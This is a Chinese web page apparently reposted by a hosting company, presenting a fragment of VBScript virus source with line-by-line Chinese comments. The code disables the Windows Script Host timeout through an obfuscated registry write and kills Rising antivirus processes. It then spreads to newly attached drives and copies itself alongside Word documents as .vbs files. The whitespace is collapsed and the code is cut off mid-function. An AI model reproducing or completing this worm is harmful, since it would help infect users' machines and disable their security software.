vbs病毒源文件
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
| etfiles=folder_.files foreachfileinfiles(foreach。。。next对数组或集合中的每个元素重复执行一组语句) iffile.name="wordicon.exe"then reg=file.name regpath=file.path exitFunction endif next(foreach的next) setsubfolders=folder_.subfolders(set是一个赋值语句) foreachsubfolderinsubfolders scandoc(subfolder) next endFunction(结束子程序的定义) Functionregtime()(定义一个子程序添加注册表,结束瑞星) a6="R.Re"&"gWri"&chr(116)&"e"(a6=R.RegWrichr(116)echr(116)是值) a8="HKE"&"Y_CUR"&"RENT_US"&"ER\Soft"&"ware\Micr"&"osoft\Win"&"dowsScr"&"iptingHo"&"st\Settin"&"gs\Timeou(a8=注册表HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout) ppp=a6&Space(2)&chr(34)&a8&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34) Executeppp(对指定的字符串执行正则表达式搜索) dimNameorPID kill=Array("RavMon.exe","RavTask.exe","RavStub.exe","RavMond.exe","RsAgent.exe") fori=0to4 KillProcess(kill(i))(结束4个瑞星程序) next endFunction(结束这个子程序) Functionganranfile(aa)(定义一个子程序) OnErrorResumeNext(出错不报告) dimx Fori=1ToLen(aa)(len函数返回字符串内字符的数目,或是存储一变量所需的字节数) x=Mid(aa,i,1)(mid函数从字符串中返回指定数目的字符。这里是一个个返回给X) ifx=""then x=Mid(aa,1,1) i=1 endif Setx=fs.GetDrive(x) ifx.IsReadythen scan(x) else xunhuan() endif Next endFunction(结束本子程序,作用不明) Functionscan(x)(定义子程序scan(a)) OnErrorResumeNext(出错不报告) dimfiles,file,subfolder,folder_ setfolder_=fs.getfolder(x) setfiles=folder_.files foreachfileinfiles s=file.path ext=fs.GetExtensionName(file) ext=lcase(ext)(lcase函数返回字符串的小写形式) ifext="doc"then fff=sss&".copy("&chr(34)&mid(s,1,len(s)-3)&"vbs"&chr(34)&")"(fff是sss.copy加几个字符 怀疑这个几个字符组成一个文件名) Executefff endif next setsubfolders=folder_.subfolders foreachsubfolderinsubfolders scan(subfolder) next endFunction Functionganrandisk() OnErrorResumeNext regwrite() dimdoc,d,s,coun,w,h,oo Setdoc=fs.Drives foreachkindoc ifk.IsReadythen h=h&k.DriveLetter endif next t1=len(Trim(h)) coun=doc.count dowhilecoun>0 oo=h&w clearinfo(oo) wscript.sleep50 Setd=fs.Drives ifd.count>counthen foreachkind ifk.IsReadythen s=s&k.DriveLetter endif next coun=d.count t=StrReverse(LCase(Trim(s))) w=mid(t,1,abs(len(t)-t1)) countdrive(w) ganranfile(w) s=trim("") t1=len(t) endif ifd.count<counthen foreachkind ifk.IsReadythen s=s&k.DriveLetter endif next coun=d.count t=StrReverse(LCase(Trim(s))) s=trim("") t1=len(t) endif loop endFunction Functionxunhuan() OnErrorResumeNext dimsfo setsfo=fs.GetDrive(fs.GetDriveName(dvbs.path)) ifdvbs.name="autorun.vbs"ordvbs.name="USBDRIVE.dll"then ifsfo.DriveType=2then ganrandisk() else wscript.quit endif else dvbs.delete(true) endif endFunction Functionclearinfo(oo) OnErrorResumeNext dimdc,z oo=LCase(Trim(oo)) Form=1ToLen(oo) z=Mid(oo,m,1) Setz=fs.GetDrive(z) findinf(z) v=Array(z.DriveLetter&":\recycled",z.DriveLetter&":\SystemVolumeInformation") fori=0to1 scanexe(v(i)) next next vir=array(fs.GetSpecialFolder(1)&"\recycled",fs.GetSpecialFolde |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 用vbs操作注册表实例代码下一篇: 学习 WSH 的理由小结
关于vbs病毒源文件的所有评论
